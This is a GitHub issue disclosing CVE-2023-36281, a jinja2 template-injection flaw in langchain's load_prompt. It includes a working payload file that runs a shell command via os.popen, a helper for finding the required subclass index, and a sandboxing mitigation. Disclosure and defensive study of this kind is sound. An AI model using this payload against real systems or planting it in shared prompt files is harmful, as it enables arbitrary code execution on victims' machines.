CVE-2023-36281: Template injection to arbitrary code execution · Issue #4394 · langchain-ai/langchain
An issue in langchain v0.0.171 allows a remote attacker to execute arbitrary code via a JSON file passed to the load_prompt function.
System Info
Windows 11
Who can help?
No response
Information
- The official example notebooks/scripts
- My own modified scripts
Related Components
- LLMs/Chat Models
- Embedding Models
- Prompts / Prompt Templates / Prompt Selectors
- Output Parsers
- Document Loaders
- Vector Stores / Retrievers
- Memory
- Agents / Agent Executors
- Tools / Toolkits
- Chains
- Callbacks/Tracing
- Async
Reproduction
- Save the following data to pt.json:

```json
{
  "input_variables": ["prompt"],
  "output_parser": null,
  "partial_variables": {},
  "template": "Tell me a {{ prompt }} {{ ''.__class__.__bases__[0].__subclasses__()[147].__init__.__globals__['popen']('dir').read() }}",
  "template_format": "jinja2",
  "validate_template": true,
  "_type": "prompt"
}
```
- Run:

```python
from langchain.prompts import load_prompt

loaded_prompt = load_prompt("pt.json")
loaded_prompt.format(history="", prompt="What is 1 + 1?")
```
- The `dir` command will be executed.
Attack scenario: Alice sends a prompt file to Bob and gets Bob to load it.
Analysis: Jinja2 is used to render the prompt, so template injection can occur.
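The root cause can be reproduced with Jinja2 alone. The following minimal sketch (the template text is illustrative, not taken from langchain's code) shows that an attacker-controlled jinja2 template can walk Python's object graph out of the rendering context:

```python
# Minimal Jinja2-only sketch of the injection, independent of langchain.
# The expression escapes the template context and enumerates loaded classes;
# the payload in pt.json goes one step further and calls os.popen.
from jinja2 import Template

malicious = "Tell me a {{ prompt }} {{ ''.__class__.__bases__[0].__subclasses__() }}"
print(Template(malicious).render(prompt="joke"))  # dumps every loaded class
```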
Note: the template in pt.json contains the payload; the index into `__subclasses__()` (147 here) may differ in other environments.
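Because that index shifts between Python builds, an attacker would typically enumerate the subclass list first. The helper below is a hypothetical illustration (the function name is mine, not part of the exploit) of how the offset used in the payload can be located:

```python
# Hypothetical helper: locate a subclass whose __init__ globals expose os.popen
# (commonly os._wrap_close). The index it returns replaces the hard-coded 147.
def find_popen_index():
    for i, cls in enumerate(''.__class__.__bases__[0].__subclasses__()):
        init_globals = getattr(cls.__init__, "__globals__", None)
        if init_globals and "popen" in init_globals:
            return i, cls.__name__
    return None, None

print(find_popen_index())  # e.g. (147, "_wrap_close"); varies per environment
```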
Expected behavior
Code should not be executed.
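One way to meet this expectation, shown only as a sketch and not necessarily the fix langchain adopted, is to render untrusted jinja2 templates inside Jinja2's sandbox, which refuses access to dunder attributes:

```python
# Sketch of a mitigation: Jinja2's SandboxedEnvironment blocks unsafe attribute
# access such as __class__/__subclasses__ and raises SecurityError instead.
from jinja2.sandbox import SandboxedEnvironment
from jinja2.exceptions import SecurityError

env = SandboxedEnvironment()
payload = "{{ ''.__class__.__bases__[0].__subclasses__() }}"
try:
    env.from_string(payload).render()
except SecurityError as exc:
    print("blocked:", exc)
```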